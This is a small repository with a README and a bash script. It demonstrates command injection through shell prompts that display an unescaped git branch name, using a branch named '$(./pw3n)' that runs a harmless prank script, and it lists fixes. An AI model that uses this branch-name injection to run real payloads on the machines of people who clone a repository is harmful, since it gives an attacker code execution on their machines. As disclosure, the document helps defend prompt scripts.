├── README.md
└── pw3n


/README.md:
--------------------------------------------------------------------------------
 1 | # pw3nage
 2 | If you get pw3ned, might want to fix your shell
 3 | 
 4 | This is a rather silly POC of a vulnerability in custom shell prompt scripts that I suspect is rather widespread. I noticed
 5 | when working on a branch that included (for the sake of cuteness) a `$` that my prompt that usually includes the branch
 6 | name had a bunch of gibberish. I suspected the zsh pluging I was using did not properly escape shell metacharacters, so
 7 | I tried a few more things and landed on this.
 8 | 
 9 | How it works:
10 | 1. This repo has an unusually-named default branch of `$(./pw3n)`
11 | 2. The repo contains a script at the path referenced in the branch name
12 | 3. When you cd to this repo, if your shell prompt tries to display your branch name and does't correctly escape $(..) expressions, it will execute `./pw3n`
13 | 
14 | Fixes:
15 |  - only show whitelisted characters `branch=${BRANCH//[^a-z0-9\/]/-}`
16 |  - construct PS1 to reference a variable that holds
17 |    the branch name [official git prompt fix](https://github.com/git/git/commit/8976500cbbb13270398d3b3e07a17b8cc7bff43f)
18 | 


--------------------------------------------------------------------------------
/pw3n:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | function pw3n_osx {
 4 |     say 'pawned you!'
 5 |     osascript -e 'tell app "Finder" to display dialog "Hacked by Chinese!"' >/dev/null 2>&1
 6 | }
 7 | 
 8 | function pw3n_other {
 9 |     echo 'pw3nd by git prompt' | wall
10 | }
11 | 
12 | case "$OSTYPE" in
13 |   darwin*)  pw3n_osx;;
14 |   *)   pw3n_other;;
15 | esac
16 | 


--------------------------------------------------------------------------------